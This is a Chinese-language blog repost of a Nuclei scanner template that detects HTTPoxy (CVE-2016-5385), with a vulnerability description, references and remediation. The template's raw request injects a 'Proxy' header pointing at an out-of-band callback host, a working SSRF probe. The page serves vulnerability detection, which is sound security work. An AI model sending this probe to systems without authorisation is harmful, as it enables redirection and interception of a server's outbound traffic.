HTTPoxy - Proxy Header to HTTP_PROXY Env Injection

漏洞信息

漏洞名称: HTTPoxy - Proxy Header to HTTP_PROXY Env Injection

漏洞编号:

  • CVE: CVE-2016-5385

漏洞类型: 服务器端请求伪造

漏洞等级: 高危

漏洞描述: HTTPoxy漏洞影响使用环境变量的CGI基础应用程序。当提供Proxy头时,它可以被转换为HTTP_PROXY环境变量,该变量被各种库(如Guzzle、curl、requests)使用,允许攻击者将出站流量重定向到他们控制的服务器。受影响的典型部署场景包括广泛使用的Web服务器和应用程序,尤其是在使用PHP和FastCGI的环境中。该漏洞的技术根源在于不当的输入验证,允许恶意构造的HTTP头被错误地解释为环境变量。这种漏洞可能导致严重的安全风险,包括数据泄露和服务中断,因为攻击者可以操纵服务器端的HTTP客户端行为,通过恶意代理泄露数据或重定向流量。值得注意的是,这种攻击不需要认证,可以自动利用,因此对受影响系统的威胁尤为严重。

产品名称: CGI-based applications

来源: https://github.com/projectdiscovery/nuclei-templates/blob/e0fa7e8642c0e7274eebcad45d95af9ba4b6785b/http%2Fcves%2F2016%2FCVE-2016-5385.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46

id: CVE-2016-5385

info:
  name: HTTPoxy - Proxy Header to HTTP_PROXY Env Injection
  author: oxqnd
  severity: high
  description: |
    HTTPoxy is a vulnerability affecting CGI-based applications using environment variables. 
    When a Proxy header is supplied, it can be translated to the HTTP_PROXY environment variable,
    which is used by various libraries (e.g. Guzzle, curl, requests), allowing attackers to redirect 
    outbound traffic to a server they control.
  impact: |
    Attackers can manipulate server-side HTTP client behavior to leak data or redirect traffic
    through malicious proxies.
  remediation: |
    Unset the HTTP_PROXY environment variable before request handling or block the Proxy header at the web server.
  reference:
    - https://httpoxy.org/
    - https://nvd.nist.gov/vuln/detail/CVE-2016-5385
    - https://bugzilla.redhat.com/show_bug.cgi?id=1353794
    - https://github.com/guzzle/guzzle/releases/tag/6.2.1
  classification:
    cve-id: CVE-2016-5385
    cwe-id: CWE-601
    cvss-score: 8.1
  tags: cve,cve2016,httpoxy,env,guzzle,proxy,php,fastcgi,header-injection

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Proxy: http://{{interactsh-url}}

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - http

      - type: status
        status:
          - 200


Github Poc
#projectdiscovery/nuclei-templates:github issues #服务器端请求伪造
HTTPoxy - Proxy Header to HTTP_PROXY Env Injection
http://example.com/2025/08/03/github_2532100570/
作者
lianccc
发布于
2025年8月3日
许可协议